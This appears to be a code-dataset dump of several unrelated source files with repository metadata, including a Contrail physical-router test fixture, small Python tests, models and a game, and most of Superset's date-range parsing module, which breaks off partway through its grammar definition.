        bgp_router_id = self.vnc_api_h.bgp_router_create(bgp_router)
        bgp_router_obj = self.vnc_api_h.bgp_router_read(id=bgp_router_id)
        self.logger.info('Created BGP router %s with ID %s' % (
            bgp_router_obj.fq_name, bgp_router_obj.uuid))
        return bgp_router_obj
    # end create_bgp_router
    def delete_bgp_router(self):
        # Delete the BgpRouter object created (or found) during setUp.
        self.vnc_api_h.bgp_router_delete(id=self.bgp_router.uuid)
        self.logger.info('Deleted BGP router : %s' % (self.bgp_router.uuid))
    def add_bgp_router(self, bgp_router):
        # Re-read the device first so the update is applied on a fresh object.
        self.phy_device = self.vnc_api_h.physical_router_read(id=self.phy_device.uuid)
        self.phy_device.add_bgp_router(bgp_router)
        self.vnc_api_h.physical_router_update(self.phy_device)
    def unbind_bgp_router(self, bgp_router):
        # Detach the given BGP router from the physical device.
        self.phy_device = self.vnc_api_h.physical_router_read(id=self.phy_device.uuid)
        self.phy_device.del_bgp_router(bgp_router)
        self.vnc_api_h.physical_router_update(self.phy_device)
    def delete_device(self):
        # Detach our BGP router before deleting the device itself.
        self.phy_device = self.vnc_api_h.physical_router_read(id=self.phy_device.uuid)
        self.phy_device.del_bgp_router(self.bgp_router)
        self.vnc_api_h.physical_router_update(self.phy_device)
        super(PhysicalRouterFixture, self).delete_device()
    def setUp(self):
        super(PhysicalRouterFixture, self).setUp()
        bgp_fq_name = ['default-domain', 'default-project',
                       'ip-fabric', '__default__', self.name]
        try:
            # Reuse an existing BGP router if one with this name exists.
            self.bgp_router = self.vnc_api_h.bgp_router_read(
                fq_name=bgp_fq_name)
            # NOTE(review): both flags are set here; `already_present` is
            # presumably consumed by the base fixture -- confirm.
            self.already_present = True
            self.logger.info('BGP router %s already present' % (
                bgp_fq_name))
            self.bgp_router_already_present = True
        except vnc_api_test.NoIdError:
            if self.inputs.is_gui_based_config():
                self.bgp_router = self.webui.create_bgp_router(self)
            else:
                self.bgp_router = self.create_bgp_router()
        try:
            # Best-effort bind of the BGP router to the physical device.
            if not self.inputs.is_gui_based_config():
                self.add_bgp_router(self.bgp_router)
        except Exception as e:
            pass
        # SSH session to the router, used by the get_* helpers below.
        self.router_session = self.get_connection_obj(self.vendor,
            host=self.mgmt_ip,
            username=self.ssh_username,
            password=self.ssh_password,
            logger=self.logger)
    def cleanUp(self):
        super(PhysicalRouterFixture, self).cleanUp()
        # Only remove the BGP router if this fixture created it.
        do_cleanup = True
        if self.bgp_router_already_present:
            do_cleanup = False
        if do_cleanup:
            if self.inputs.is_gui_based_config():
                self.webui.delete_bgp_router(self)
            else:
                self.delete_bgp_router()
    def get_irb_mac(self):
        # MAC address of the router's 'irb' interface.
        return self.router_session.get_mac_address('irb')
    def get_virtual_gateway_mac(self, ip_address):
        # MAC for the given IP as seen in the router's ARP table.
        return self.router_session.get_mac_in_arp_table(ip_address)
# end PhysicalRouterFixture
if __name__ == "__main__":
    # Nothing to run directly; this module only provides the fixture class.
    pass
| [
"lmadhusudhan@juniper.net"
] | lmadhusudhan@juniper.net |
e7bc050fb62cf8278450687a7d0018fb13307a67 | 5cff419c080e87ac82e17c9cee8329faa6b66188 | /eventsourcing/tests/test_thespian_runner_with_django.py | d58bb32f104b867ffd389700578e99a714b32868 | [
"BSD-3-Clause"
] | permissive | Shaibujnr/eventsourcing | 56ab35e44a634822a3ce22562c20cfa83b24a73f | a2d8a7ff728f89714f0529791f3bd56498297784 | refs/heads/master | 2022-06-05T04:46:18.159071 | 2020-03-11T18:46:44 | 2020-03-11T18:46:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 358 | py | from eventsourcing.tests.sequenced_item_tests.test_django_record_manager import (
DjangoTestCase,
)
from eventsourcing.application.django import DjangoApplication
from eventsourcing.tests.test_thespian_runner import TestThespianRunner
class TestThespianRunnerWithDjango(DjangoTestCase, TestThespianRunner):
    # Re-run the inherited Thespian runner test suite with the
    # Django-backed application infrastructure.
    infrastructure_class = DjangoApplication
| [
"john.bywater@appropriatesoftware.net"
] | john.bywater@appropriatesoftware.net |
bf093a092413ad521ff3443ebcd6a938f922c0ff | 727f1bc2205c88577b419cf0036c029b8c6f7766 | /out-bin/py/google/fhir/models/run_locally.runfiles/com_google_fhir/external/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/python/estimator/training.py | cde5e25c415bc1d204d3f60f2bd3ffb0f37cc756 | [
"Apache-2.0"
] | permissive | rasalt/fhir | 55cf78feed3596a3101b86f9e9bbf6652c6ed4ad | d49883cc4d4986e11ca66058d5a327691e6e048a | refs/heads/master | 2020-04-13T00:16:54.050913 | 2019-01-15T14:22:15 | 2019-01-15T14:22:15 | 160,260,223 | 0 | 0 | Apache-2.0 | 2018-12-03T22:07:01 | 2018-12-03T22:07:01 | null | UTF-8 | Python | false | false | 180 | py | /home/rkharwar/.cache/bazel/_bazel_rkharwar/c4bcd65252c8f8250f091ba96375f9a5/external/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/python/estimator/training.py | [
"ruchika.kharwar@gmail.com"
] | ruchika.kharwar@gmail.com |
106728c42ed86048ef123884e38430115efdd1af | c2d4968c32a4356138a82d9684c86d8759b6f47b | /groupdocs/models/SignatureEnvelopeDocumentsResult.py | 30939f8d6839534c8d55bb88f5e1c622bf254a4a | [] | no_license | liosha2007/groupdocs-heroku-examples-for-python | 77ffe432883f266dc049a8bc4e966fd86a717577 | a96a89c7d9e8798fd5bf769e0c929dfaa1702bf9 | refs/heads/master | 2021-01-01T19:43:27.526546 | 2013-08-05T05:43:34 | 2013-08-05T05:43:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,066 | py | #!/usr/bin/env python
"""
Copyright 2012 GroupDocs.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class SignatureEnvelopeDocumentsResult:
    """Swagger model for the documents attached to a signature envelope.

    NOTE: This class is auto generated by the swagger code generator
    program; do not edit it manually.
    """
    def __init__(self):
        # Maps each attribute name to its swagger type descriptor, used by
        # the generated (de)serialization machinery.
        self.swaggerTypes = {
            'documents': 'list[SignatureEnvelopeDocumentInfo]',
            'envelopeId': 'str'
        }
        # Attributes start unset and are filled in by the deserializer.
        self.envelopeId = None  # str
        self.documents = None  # list[SignatureEnvelopeDocumentInfo]
| [
"aleksey.permyakov@groupdocs.com"
] | aleksey.permyakov@groupdocs.com |
e6108fb32123d4fbee90708c4cf86bb1e6b75ce0 | ff23e5c890216a1a63278ecb40cd7ac79ab7a4cd | /clients/kratos/python/test/test_message.py | d7bbd553c9e96215a809d9ad5f8b74270dafedb9 | [
"Apache-2.0"
] | permissive | ory/sdk | fcc212166a92de9d27b2dc8ff587dcd6919e53a0 | 7184e13464948d68964f9b605834e56e402ec78a | refs/heads/master | 2023-09-01T10:04:39.547228 | 2023-08-31T08:46:23 | 2023-08-31T08:46:23 | 230,928,630 | 130 | 85 | Apache-2.0 | 2023-08-14T11:09:31 | 2019-12-30T14:21:17 | C# | UTF-8 | Python | false | false | 1,284 | py | """
Ory Identities API
This is the API specification for Ory Identities with features such as registration, login, recovery, account verification, profile settings, password reset, identity management, session management, email and sms delivery, and more. # noqa: E501
The version of the OpenAPI document: v1.0.0
Contact: office@ory.sh
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import ory_kratos_client
from ory_kratos_client.model.courier_message_status import CourierMessageStatus
from ory_kratos_client.model.courier_message_type import CourierMessageType
from ory_kratos_client.model.message_dispatch import MessageDispatch
# Inject the imported model classes into this module's globals so the
# generated code's lazy/circular model references resolve by name.
globals()['CourierMessageStatus'] = CourierMessageStatus
globals()['CourierMessageType'] = CourierMessageType
globals()['MessageDispatch'] = MessageDispatch
from ory_kratos_client.model.message import Message
class TestMessage(unittest.TestCase):
    """Message unit test stubs (auto-generated scaffold)."""
    def setUp(self):
        # No fixtures required by the generated stub.
        pass
    def tearDown(self):
        pass
    def testMessage(self):
        """Test Message"""
        # FIXME: construct object with mandatory attributes with example values
        # model = Message() # noqa: E501
        pass
if __name__ == '__main__':
unittest.main()
| [
"3372410+aeneasr@users.noreply.github.com"
] | 3372410+aeneasr@users.noreply.github.com |
a87b819f18508bfd72a1ccd2fc1fce02dfdf811c | 4133fce90189868a246e916a5851dc05bf5e2172 | /eOwner/bookbus/forms.py | 6c08628a00148c0cc38fe490fd975d8d288ad4a9 | [] | no_license | achanyasuresh12/eowner | 47ea8dfeb7dc63c1ea934d1d05f0714f14a3fde8 | bcfd6d3069a34e3bde7c760a60d43a7553078b23 | refs/heads/master | 2020-04-07T19:10:59.995107 | 2018-11-22T04:24:15 | 2018-11-22T04:24:15 | 158,639,004 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 186 | py | from django import forms
from . import models
class bookbus_forms(forms.ModelForm):
class Meta:
model = models.Bookbus
fields = ["source", "destination", "date"]
| [
"45094866+achanyasuresh12@users.noreply.github.com"
] | 45094866+achanyasuresh12@users.noreply.github.com |
a161fd71a289da90daa7f083d6e9669340fa178b | 5c7da7dabdc076ad7113ccd20561a8bbf5f9a70e | /documents/migrations/0039_auto_20200921_1652.py | 14c75f0cf092c56569d4c8734f95d131ab823e9a | [] | no_license | aqcloudacio/cloudaciofeez | 2499fb5fc5334fa871daab2abea6c34bfa8c7667 | 8399560ece9aa10a6d6801f42c027dca26a65936 | refs/heads/master | 2023-02-27T22:36:20.501159 | 2021-02-11T00:03:46 | 2021-02-11T00:03:46 | 337,887,413 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 714 | py | # Generated by Django 2.2.7 on 2020-09-21 06:52
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('documents', '0038_theme_default'),
]
operations = [
migrations.AlterField(
model_name='structure',
name='theme',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='structures', to='documents.Theme'),
preserve_default=False,
),
migrations.AddConstraint(
model_name='structure',
constraint=models.UniqueConstraint(fields=('theme',), name='unique_theme'),
),
]
| [
"alejandro.quintero@clouxter.com"
] | alejandro.quintero@clouxter.com |
fcf1b34b972a4a2c7edd899130321198c2ddb57c | ff62ac78e34cdaf6d5d3bc7230a4f4aee740b142 | /HigherLowerGameProject/main.py | 6276b3debd940e6df69de059668e95a99a27fdd8 | [] | no_license | suriyaganesh97/pythonbasicprogs | 7ff67ca6193150d9c61e1eb10e2727694d9b7c6e | ffb599f1804654785757fea4b0f36b11094a4fae | refs/heads/master | 2022-01-03T22:07:27.625938 | 2022-01-02T11:35:28 | 2022-01-02T11:35:28 | 253,271,886 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,213 | py | import random
from gameData import data
#print two random person initially followers store in variable
dict_1 = random.choice(data)
dict_1_follower_count = dict_1["follower_count"]
is_game_over = False
current_score = 0
while not is_game_over:
dict_2 = random.choice(data)
dict_2_follower_count = dict_2["follower_count"]
print(f'A is {dict_1["name"]}, description is {dict_1["description"]}, country is {dict_1["country"]}')
print(f'B is {dict_2["name"]}, description is {dict_2["description"]}, country is {dict_2["country"]}')
# print statemnets for debugging
print(dict_1_follower_count)
print(dict_2_follower_count)
user_guess = input("who do you think has high no of followers A or B: ")
if user_guess == "A" or user_guess == "a":
if dict_1_follower_count > dict_2_follower_count:
print(f'yes you are right.{dict_1["name"]} has {dict_1_follower_count} followers and {dict_2["name"]} has only {dict_2_follower_count} followers')
current_score += 1
elif dict_2_follower_count > dict_1_follower_count:
print(f'you are wrong.{dict_2["name"]} has {dict_2_follower_count} followers while {dict_1["name"]} has only {dict_1_follower_count} followers')
print(f"your total score is {current_score}")
is_game_over = True
else:
print(f'both have same no of {dict_1_follower_count} followers')
elif user_guess == "B" or user_guess == "b":
if dict_2_follower_count > dict_1_follower_count:
print(f'yes you are right.{dict_2["name"]} has {dict_2_follower_count} followers and {dict_1["name"]} has only {dict_1_follower_count} followers')
current_score += 1
dict_1 = dict_2
elif dict_1_follower_count > dict_2_follower_count:
print(f'you are wrong.{dict_1["name"]} has {dict_1_follower_count} followers while {dict_2["name"]} has only {dict_2_follower_count} followers')
print(f"your total score is {current_score}")
is_game_over = True
else:
print(f'both have same no of {dict_1_follower_count} followers')
else:
print("invalid input")
is_game_over = True
| [
"63084594+suriyaganesh97@users.noreply.github.com"
] | 63084594+suriyaganesh97@users.noreply.github.com |
def detect_anagrams(word, list):
    """Return the entries of *list* that are anagrams of *word*.

    Matching is case-insensitive, and a word never counts as an anagram
    of itself, even when it differs only by letter case.

    Fixes over the original: ``dict.has_key`` is Python-2-only (it
    crashes on Python 3), and the self-exclusion test compared against
    the original-cased *word*, so e.g. ``detect_anagrams("BANANA",
    ["banana"])`` wrongly returned ``["banana"]``.
    """
    from collections import Counter  # local import keeps the snippet self-contained
    target = word.lower()
    target_letters = Counter(target)
    # Keep candidates with exactly the same letter multiset that are not
    # merely a re-cased copy of the original word.
    return [
        candidate
        for candidate in list
        if candidate.lower() != target and Counter(candidate.lower()) == target_letters
    ]
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
3aefdabdebf9932e2ea0544a8fd53183c0ecebdf | c89543dd926c1787c40616ed174a3d1371c54449 | /superset/utils/date_parser.py | 7e79c72f1eb780198498781f58549b99fbbf3d9a | [
"Apache-2.0",
"OFL-1.1"
] | permissive | j420247/incubator-superset | 7c7bff330393f0e91f5e67782f35efe8c735250a | c9b9b7404a2440a4c9d3173f0c494ed40f7fa2bd | refs/heads/master | 2023-03-11T21:53:16.827919 | 2023-02-03T19:04:17 | 2023-02-03T19:04:17 | 157,780,350 | 1 | 1 | Apache-2.0 | 2023-03-07T00:14:51 | 2018-11-15T22:24:29 | TypeScript | UTF-8 | Python | false | false | 17,370 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import calendar
import logging
import re
from datetime import datetime, timedelta
from time import struct_time
from typing import Dict, List, Optional, Tuple
import pandas as pd
import parsedatetime
from dateutil.parser import parse
from dateutil.relativedelta import relativedelta
from flask_babel import lazy_gettext as _
from holidays import country_holidays
from pyparsing import (
CaselessKeyword,
Forward,
Group,
Optional as ppOptional,
ParseException,
ParserElement,
ParseResults,
pyparsing_common,
quotedString,
Suppress,
)
from superset.charts.commands.exceptions import (
TimeDeltaAmbiguousError,
TimeRangeAmbiguousError,
TimeRangeParseFailError,
)
from superset.constants import NO_TIME_RANGE
from superset.utils.memoized import memoized
ParserElement.enablePackrat()
logger = logging.getLogger(__name__)
def parse_human_datetime(human_readable: str) -> datetime:
    """Returns ``datetime.datetime`` from human readable strings.

    Raises ``TimeRangeAmbiguousError`` for bare "<N> <grain>" phrases
    (past or future is unspecified) and ``TimeRangeParseFailError`` when
    neither parser understands the input.
    """
    x_periods = r"^\s*([0-9]+)\s+(second|minute|hour|day|week|month|quarter|year)s?\s*$"
    if re.search(x_periods, human_readable, re.IGNORECASE):
        raise TimeRangeAmbiguousError(human_readable)
    try:
        # First try dateutil; missing fields default to Jan 1 of this year.
        default = datetime(year=datetime.now().year, month=1, day=1)
        dttm = parse(human_readable, default=default)
    except (ValueError, OverflowError) as ex:
        # Fall back to parsedatetime for natural-language phrases.
        cal = parsedatetime.Calendar()
        parsed_dttm, parsed_flags = cal.parseDT(human_readable)
        # 0 == not parsed at all
        if parsed_flags == 0:
            logger.debug(ex)
            raise TimeRangeParseFailError(human_readable) from ex
        # when time is not extracted, we 'reset to midnight'
        if parsed_flags & 2 == 0:
            parsed_dttm = parsed_dttm.replace(hour=0, minute=0, second=0)
        dttm = dttm_from_timetuple(parsed_dttm.utctimetuple())
    return dttm
def normalize_time_delta(human_readable: str) -> Dict[str, int]:
    """Convert a phrase like ``"1 year ago"`` into a timedelta kwargs dict.

    Returns a single-entry mapping such as ``{"years": -1}``; the amount
    is negated when the phrase says "ago".  Raises
    ``TimeDeltaAmbiguousError`` when the phrase does not match.
    """
    x_unit = r"^\s*([0-9]+)\s+(second|minute|hour|day|week|month|quarter|year)s?\s+(ago|later)*$"  # pylint: disable=line-too-long,useless-suppression
    match = re.match(x_unit, human_readable, re.IGNORECASE)
    if match is None:
        raise TimeDeltaAmbiguousError(human_readable)
    amount, unit, direction = match.groups()
    signed_amount = -int(amount) if direction == "ago" else int(amount)
    return {unit + "s": signed_amount}
def dttm_from_timetuple(date_: struct_time) -> datetime:
    """Build a ``datetime`` from the first six fields of a ``struct_time``.

    Sub-second precision and timezone information are intentionally
    dropped, so results are second-aligned and naive.
    """
    year, month, day, hour, minute, second = date_[:6]
    return datetime(year, month, day, hour, minute, second)
def get_past_or_future(
    human_readable: Optional[str],
    source_time: Optional[datetime] = None,
) -> datetime:
    """Resolve *human_readable* relative to *source_time* (default: now).

    Both the anchor and the result go through ``dttm_from_timetuple``,
    so microseconds are dropped and values are second-aligned.
    """
    cal = parsedatetime.Calendar()
    source_dttm = dttm_from_timetuple(
        source_time.timetuple() if source_time else datetime.now().timetuple()
    )
    # An empty/None phrase parses as the anchor time itself.
    return dttm_from_timetuple(cal.parse(human_readable or "", source_dttm)[0])
def parse_human_timedelta(
    human_readable: Optional[str],
    source_time: Optional[datetime] = None,
) -> timedelta:
    """
    Returns ``datetime.timedelta`` from natural language time deltas
    >>> parse_human_timedelta('1 day') == timedelta(days=1)
    True
    """
    # Anchor the subtraction to the same second-aligned base used by
    # get_past_or_future so the difference is exactly the requested delta.
    source_dttm = dttm_from_timetuple(
        source_time.timetuple() if source_time else datetime.now().timetuple()
    )
    return get_past_or_future(human_readable, source_time) - source_dttm
def parse_past_timedelta(
    delta_str: str, source_time: Optional[datetime] = None
) -> timedelta:
    """Resolve a delta such as ``'1 year'`` as a positive span into the past.

    ``parse_human_timedelta('1 year')`` measures one year into the
    future; this helper measures the same period backwards from
    *source_time* and flips the sign, so the result reads as a positive
    duration (e.g. ``timedelta(365)``).
    """
    if delta_str.startswith("-"):
        backwards = delta_str
    else:
        backwards = f"-{delta_str}"
    return -parse_human_timedelta(backwards, source_time)
def get_since_until(  # pylint: disable=too-many-arguments,too-many-locals,too-many-branches
    time_range: Optional[str] = None,
    since: Optional[str] = None,
    until: Optional[str] = None,
    time_shift: Optional[str] = None,
    relative_start: Optional[str] = None,
    relative_end: Optional[str] = None,
) -> Tuple[Optional[datetime], Optional[datetime]]:
    """Return `since` and `until` date time tuple from string representations of
    time_range, since, until and time_shift.
    This function supports both reading the keys separately (from `since` and
    `until`), as well as the new `time_range` key. Valid formats are:
    - ISO 8601
    - X days/years/hours/day/year/weeks
    - X days/years/hours/day/year/weeks ago
    - X days/years/hours/day/year/weeks from now
    - freeform
    Additionally, for `time_range` (these specify both `since` and `until`):
    - Last day
    - Last week
    - Last month
    - Last quarter
    - Last year
    - No filter
    - Last X seconds/minutes/hours/days/weeks/months/years
    - Next X seconds/minutes/hours/days/weeks/months/years
    """
    separator = " : "
    # Anchors for one-sided ranges ("Last ...", "Next ...").
    _relative_start = relative_start if relative_start else "today"
    _relative_end = relative_end if relative_end else "today"
    if time_range == NO_TIME_RANGE or time_range == _(NO_TIME_RANGE):
        return None, None
    # Expand one-sided shorthands into a full "<since> : <until>" range.
    if time_range and time_range.startswith("Last") and separator not in time_range:
        time_range = time_range + separator + _relative_end
    if time_range and time_range.startswith("Next") and separator not in time_range:
        time_range = _relative_start + separator + time_range
    # "previous calendar ..." shorthands are rewritten into the formal
    # DATETRUNC/DATEADD expression language evaluated by datetime_eval.
    if (
        time_range
        and time_range.startswith("previous calendar week")
        and separator not in time_range
    ):
        time_range = "DATETRUNC(DATEADD(DATETIME('today'), -1, WEEK), WEEK) : DATETRUNC(DATETIME('today'), WEEK)"  # pylint: disable=line-too-long,useless-suppression
    if (
        time_range
        and time_range.startswith("previous calendar month")
        and separator not in time_range
    ):
        time_range = "DATETRUNC(DATEADD(DATETIME('today'), -1, MONTH), MONTH) : DATETRUNC(DATETIME('today'), MONTH)"  # pylint: disable=line-too-long,useless-suppression
    if (
        time_range
        and time_range.startswith("previous calendar year")
        and separator not in time_range
    ):
        time_range = "DATETRUNC(DATEADD(DATETIME('today'), -1, YEAR), YEAR) : DATETRUNC(DATETIME('today'), YEAR)"  # pylint: disable=line-too-long,useless-suppression
    if time_range and separator in time_range:
        # Ordered (pattern, rewriter) pairs; first match wins per side.
        time_range_lookup = [
            (
                r"^last\s+(day|week|month|quarter|year)$",
                lambda unit: f"DATEADD(DATETIME('{_relative_start}'), -1, {unit})",
            ),
            (
                r"^last\s+([0-9]+)\s+(second|minute|hour|day|week|month|year)s?$",
                lambda delta, unit: f"DATEADD(DATETIME('{_relative_start}'), -{int(delta)}, {unit})",  # pylint: disable=line-too-long,useless-suppression
            ),
            (
                r"^next\s+([0-9]+)\s+(second|minute|hour|day|week|month|year)s?$",
                lambda delta, unit: f"DATEADD(DATETIME('{_relative_end}'), {int(delta)}, {unit})",  # pylint: disable=line-too-long,useless-suppression
            ),
            (
                r"^(DATETIME.*|DATEADD.*|DATETRUNC.*|LASTDAY.*|HOLIDAY.*)$",
                lambda text: text,
            ),
        ]
        since_and_until_partition = [_.strip() for _ in time_range.split(separator, 1)]
        since_and_until: List[Optional[str]] = []
        for part in since_and_until_partition:
            if not part:
                # if since or until is "", set as None
                since_and_until.append(None)
                continue
            # Is it possible to match to time_range_lookup
            matched = False
            for pattern, fn in time_range_lookup:
                result = re.search(pattern, part, re.IGNORECASE)
                if result:
                    matched = True
                    # converted matched time_range to "formal time expressions"
                    since_and_until.append(fn(*result.groups()))  # type: ignore
            if not matched:
                # default matched case
                since_and_until.append(f"DATETIME('{part}')")
        _since, _until = map(datetime_eval, since_and_until)
    else:
        # Legacy path: separate `since`/`until` values.
        since = since or ""
        if since:
            since = add_ago_to_since(since)
        _since = parse_human_datetime(since) if since else None
        _until = (
            parse_human_datetime(until)
            if until
            else parse_human_datetime(_relative_end)
        )
    # Shift both endpoints back by the (positive) time_shift delta.
    if time_shift:
        time_delta = parse_past_timedelta(time_shift)
        _since = _since if _since is None else (_since - time_delta)
        _until = _until if _until is None else (_until - time_delta)
    if _since and _until and _since > _until:
        raise ValueError(_("From date cannot be larger than to date"))
    return _since, _until
def add_ago_to_since(since: str) -> str:
    """Append " ago" to bare two-word deltas such as "7 days".

    Backwards-compatibility hack: without it a since of "7 days" would
    be treated as 7 days in the *future*.  Only this historical, fixed
    set of grains is rewritten; anything else passes through untouched.
    """
    tokens = since.split(" ")
    if len(tokens) != 2:
        return since
    if tokens[1] not in ("days", "years", "hours", "day", "year", "weeks"):
        return since
    return since + " ago"
class EvalText:  # pylint: disable=too-few-public-methods
    """Parse action for a quoted-string operand in the datetime grammar."""
    def __init__(self, tokens: ParseResults) -> None:
        # tokens[0] is the matched quoted string, quotes included.
        self.value = tokens[0]
    def eval(self) -> str:
        """Return the literal text with its surrounding quotes removed."""
        quoted = self.value
        return quoted[1:-1]
class EvalDateTimeFunc:  # pylint: disable=too-few-public-methods
    """Parse action for DATETIME('<text>')."""
    def __init__(self, tokens: ParseResults) -> None:
        # tokens[1] is the text operand between the parentheses.
        self.value = tokens[1]
    def eval(self) -> datetime:
        # Delegates to parse_human_datetime, so both ISO dates and
        # freeform phrases like "today" are accepted.
        return parse_human_datetime(self.value.eval())
class EvalDateAddFunc:  # pylint: disable=too-few-public-methods
    """Parse action for DATEADD(date, delta, unit): shift a datetime."""
    def __init__(self, tokens: ParseResults) -> None:
        # tokens[1] is the Group (date_expr, delta, unit) from the grammar.
        self.value = tokens[1]
    def eval(self) -> datetime:
        dttm_expression, delta, unit = self.value
        dttm = dttm_expression.eval()
        # A quarter is expressed as three months before delegating.
        if unit.lower() == "quarter":
            delta = delta * 3
            unit = "month"
        return dttm + parse_human_timedelta(f"{delta} {unit}s", dttm)
class EvalDateTruncFunc:  # pylint: disable=too-few-public-methods
    """Parse action for DATETRUNC(date, unit): floor a datetime to *unit*."""
    def __init__(self, tokens: "ParseResults") -> None:
        # tokens[1] holds (date_expr, unit) from the grammar's Group(...).
        # (The annotation is a forward reference so the class does not
        # require pyparsing at definition time; behavior is unchanged.)
        self.value = tokens[1]
    def eval(self) -> datetime:
        """Return the operand datetime truncated down to the given unit."""
        dttm_expression, unit = self.value
        dttm = dttm_expression.eval()
        if unit == "year":
            dttm = dttm.replace(
                month=1, day=1, hour=0, minute=0, second=0, microsecond=0
            )
        # FIX: this was a stray `if` in an otherwise-`elif` chain; `elif`
        # keeps the chain consistent (a unit matches at most one branch,
        # so behavior is unchanged).
        elif unit == "quarter":
            dttm = (
                pd.Period(pd.Timestamp(dttm), freq="Q").to_timestamp().to_pydatetime()
            )
        elif unit == "month":
            dttm = dttm.replace(day=1, hour=0, minute=0, second=0, microsecond=0)
        elif unit == "week":
            # Monday of the same week, at midnight.
            dttm -= relativedelta(days=dttm.weekday())
            dttm = dttm.replace(hour=0, minute=0, second=0, microsecond=0)
        elif unit == "day":
            dttm = dttm.replace(hour=0, minute=0, second=0, microsecond=0)
        elif unit == "hour":
            dttm = dttm.replace(minute=0, second=0, microsecond=0)
        elif unit == "minute":
            dttm = dttm.replace(second=0, microsecond=0)
        else:
            # "second" (the only remaining grammar unit): drop microseconds.
            dttm = dttm.replace(microsecond=0)
        return dttm
class EvalLastDayFunc:  # pylint: disable=too-few-public-methods
    """Parse action for LASTDAY(date, unit): last day of a year/month/week."""
    def __init__(self, tokens: ParseResults) -> None:
        self.value = tokens[1]
    def eval(self) -> datetime:
        """Return midnight on the final day of the operand's year, month or week."""
        date_expr, unit = self.value
        anchor = date_expr.eval()
        if unit == "year":
            # December 31st of the same year, at midnight.
            return anchor.replace(
                month=12, day=31, hour=0, minute=0, second=0, microsecond=0
            )
        if unit == "month":
            # calendar.monthrange accounts for leap-year Februaries.
            last = calendar.monthrange(anchor.year, anchor.month)[1]
            return anchor.replace(
                day=last, hour=0, minute=0, second=0, microsecond=0
            )
        # The only remaining grammar unit is "week": Sunday of the same
        # Monday-based week, at midnight.
        monday = anchor - relativedelta(days=anchor.weekday())
        monday = monday.replace(hour=0, minute=0, second=0, microsecond=0)
        return monday + relativedelta(days=6)
class EvalHolidayFunc:  # pylint: disable=too-few-public-methods
    """Parse action for HOLIDAY('name'[, date[, 'country']])."""
    def __init__(self, tokens: ParseResults) -> None:
        # tokens[1] is the Group of one to three operands from the grammar.
        self.value = tokens[1]
    def eval(self) -> datetime:
        holiday = self.value[0].eval()
        dttm, country = [None, None]
        if len(self.value) >= 2:
            # NOTE(review): this assumes the second operand is the date
            # expression; if the grammar ever matched
            # HOLIDAY('name', 'country') without a date, value[1] would be
            # a text operand and .eval() would return a plain string --
            # confirm the grammar forbids that form.
            dttm = self.value[1].eval()
            if len(self.value) == 3:
                country = self.value[2]
        # Default to the current year and US holidays when unspecified.
        holiday_year = dttm.year if dttm else parse_human_datetime("today").year
        country = country.eval() if country else "US"
        holiday_lookup = country_holidays(country, years=[holiday_year], observed=False)
        searched_result = holiday_lookup.get_named(holiday)
        if len(searched_result) == 1:
            return dttm_from_timetuple(searched_result[0].timetuple())
        # Zero or multiple matches are both treated as "not found".
        raise ValueError(
            _("Unable to find such a holiday: [%(holiday)s]", holiday=holiday)
        )
@memoized
def datetime_parser() -> ParseResults:  # pylint: disable=too-many-locals
    """Build (once, via @memoized) the pyparsing grammar for the
    DATETIME/DATEADD/DATETRUNC/LASTDAY/HOLIDAY expression language used
    by time-range strings; returns the top-level date expression."""
    ( # pylint: disable=invalid-name
        DATETIME,
        DATEADD,
        DATETRUNC,
        LASTDAY,
        HOLIDAY,
        YEAR,
        QUARTER,
        MONTH,
        WEEK,
        DAY,
        HOUR,
        MINUTE,
        SECOND,
    ) = map(
        CaselessKeyword,
        "datetime dateadd datetrunc lastday holiday "
        "year quarter month week day hour minute second".split(),
    )
    # Punctuation is matched but suppressed from the parse results.
    lparen, rparen, comma = map(Suppress, "(),")
    int_operand = pyparsing_common.signed_integer().setName("int_operand")
    text_operand = quotedString.setName("text_operand").setParseAction(EvalText)
    # allow expression to be used recursively
    datetime_func = Forward().setName("datetime")
    dateadd_func = Forward().setName("dateadd")
    datetrunc_func = Forward().setName("datetrunc")
    lastday_func = Forward().setName("lastday")
    holiday_func = Forward().setName("holiday")
    date_expr = (
        datetime_func | dateadd_func | datetrunc_func | lastday_func | holiday_func
    )
    # Each function form attaches its Eval* parse action, so evaluating
    # the parse result walks the expression tree.
    datetime_func <<= (DATETIME + lparen + text_operand + rparen).setParseAction(
        EvalDateTimeFunc
    )
    dateadd_func <<= (
        DATEADD
        + lparen
        + Group(
            date_expr
            + comma
            + int_operand
            + comma
            + (YEAR | QUARTER | MONTH | WEEK | DAY | HOUR | MINUTE | SECOND)
            + ppOptional(comma)
        )
        + rparen
    ).setParseAction(EvalDateAddFunc)
    datetrunc_func <<= (
        DATETRUNC
        + lparen
        + Group(
            date_expr
            + comma
            + (YEAR | QUARTER | MONTH | WEEK | DAY | HOUR | MINUTE | SECOND)
            + ppOptional(comma)
        )
        + rparen
    ).setParseAction(EvalDateTruncFunc)
    lastday_func <<= (
        LASTDAY
        + lparen
